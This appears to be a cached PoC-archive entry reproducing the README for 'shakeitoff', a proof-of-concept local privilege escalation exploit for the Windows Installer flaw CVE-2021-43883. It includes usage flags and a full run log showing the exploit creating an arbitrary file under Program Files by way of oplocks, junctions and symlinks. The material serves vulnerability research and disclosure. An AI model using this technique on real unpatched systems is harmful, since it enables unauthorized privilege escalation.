
POC details: 8a38c9df3590955da5c175a947f7c267f42adcba

Source
Related vulnerability
Title: Microsoft Windows Installer permission and access control vulnerability (CVE-2021-43883)
Description: Microsoft Windows Installer is a component of the Windows operating system from Microsoft (USA). It provides a standard foundation for installing and uninstalling software. Microsoft Windows Installer has a permission and access control vulnerability. The following products and versions are affected: Windows 10 Version 1809 for ARM64-based Systems, Windows Server 2019, Windows Server 2019 (Server Core installation), Wind
Description
Windows MSI Installer LPE (CVE-2021-43883)
Introduction
# shakeitoff

A smaller, minimized, and cleaner version of [InstallerFileTakeOver](https://github.com/klinix5/InstallerFileTakeOver), aka the zero-day exploit that is a "variation" of CVE-2021-41379 (later assigned [CVE-2021-43883](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43883)). This version *does not* pop a shell like `InstallerFileTakeOver`. The point of this code was to create a simpler proof of concept that more reliably demonstrates the file creation attack. This proof of concept will create the arbitrary file requested by the user (and copy itself into it to prove writability). Demonstrating code execution is a trivial exercise left up to the reader.

To understand how the attack works, please see the [AttackerKB write up](https://attackerkb.com/topics/7LstI2clmF/cve-2021-41379/rapid7-analysis).

## Usage

The tool requires three parameters:

```
C:\Users\albinolobster\source\repos\shakeitoff\x64\Release>.\shakeitoff.exe
option "msi_path" is required
Allowed options:
  -h, --help              produce help message
  -m, --msi_path arg      The path to the MSI to install
  -i, --install_path arg  The path to install to
  -p, --target_path arg   The file to create
```

1. `-m` - the MSI to install (full path required). One is provided in this repository (and you should use it, since the file paths actually matter).
2. `-i` - the install path (full path required). This is where the MSI is installed / the exploit goes down. The user must specify this beforehand and it *must* be an empty directory. The tool doesn't clean it up because it makes figuring out the bug easier. There also must be a trailing `\` because I'm a monster.
3. `-p` - the file to overwrite/create. Full path required.

The PoC will just copy itself into the target file.

## Usage Example

```
C:\Users\Public>dir "C:\Program Files\lol"
 Volume in drive C has no label.
 Volume Serial Number is 5E1E-AC13

 Directory of C:\Program Files

File Not Found

C:\Users\Public>.\shakeitoff.exe -m C:\Users\Public\shakeitoff.msi -i C:\Users\Public\lol\ -p "C:\Program Files\lol"
[+] User provided MSI path: C:\Users\Public\shakeitoff.msi
[+] The target path is: C:\Program Files\lol
[+] Create the temp directory structure we'll install into
[+] Grabbing handle to lock C:\Users\Public\lol\shakeitoff\haters.jpg
[+] Grabbing a directory handle of C:\Users\Public\lol\shakeitoff\
[+] Monitor shakeitoff\shakeitoff for an rbf file
[+] MSI install: ACTION=ADMIN REBOOT=ReallySuppress TARGETDIR=C:\Users\Public\lol\ C:\Users\Public\shakeitoff.msi
[+] Grabbing a handle to inner shakeitoff directory
[+] In callback for oplock one
[+] Opening handle to C:\Users\Public\lol\shakeitoff\8da858.rbf
[+] Creating the callback directory at C:\Users\Public\lol\cb_directory
[+] Grab a handle for the callback directry
[+] Creating a junction from C:\Users\Public\lol\cb_directory to \BaseNamedObjects\Restricted
[+] Inside callback two
[+] Release the hater.jpg handle to unlock
[+] Move the rbf file to C:\Users\Public\lol\weird_directory
[+] Move inner shakeitoff to C:\Users\Public\lol\weird_directory
[+] Move junction at C:\Users\Public\lol\cb_directory to C:\Users\Public\lol\shakeitoff
[+] Configuring symlink from \BaseNamedObjects\Restricted\8da858.rbf to \??\C:\Program Files\lol
[+] symlink created!
[+] MsiInstallProductA return value: 1603
[+] Exploit thread joined
[+] Copy into target!

C:\Users\Public>dir "C:\Program Files\lol"
 Volume in drive C has no label.
 Volume Serial Number is 5E1E-AC13

 Directory of C:\Program Files

12/02/2021  02:01 PM           368,640 lol
               1 File(s)        368,640 bytes
               0 Dir(s)  86,015,610,880 bytes free
```

## Credit

* This code is influenced by the original [exploit](https://github.com/klinix5/InstallerFileTakeOver) published by Abdelhamid Naceri (also the original vulnerability discoverer!).
* The `FileOpLock` code is a (slightly modified) version pulled out of [angrypolarbearbug2](https://github.com/jackusm/polarbearrepo/tree/f37184a3fc3ffa5ea76035c9fbdee95a39d7b4c3/angrypolarbearbug2).
* Taylor Swift
File snapshot

```
[4.0K] /data/pocs/8a38c9df3590955da5c175a947f7c267f42adcba
├── [4.0K] ais
│   └── [ 13K] shakeitoff.aip
├── [1.5K] LICENSE
├── [4.0K] msi
│   └── [780K] shakeitoff.msi
├── [4.1K] README.md
├── [1.4K] shakeitoff.sln
├── [8.2K] shakeitoff.vcxproj
├── [1.6K] shakeitoff.vcxproj.filters
└── [4.0K] src
    ├── [ 12K] exploit.cpp
    ├── [ 869] exploit.h
    ├── [2.9K] FileOpLock.cpp
    ├── [ 806] FileOpLock.h
    ├── [2.8K] main.cpp
    ├── [ 38K] popl.hpp
    └── [ 956] winglue.h

3 directories, 14 files
```
Cached for you by the 神龙 (Shenlong) bot
Notes
    1. It is recommended to access the PoC through the original source first.
    2. If the source is no longer available or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. 神龙 (Shenlong) has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for or donating towards the local POC. Thank you for your support.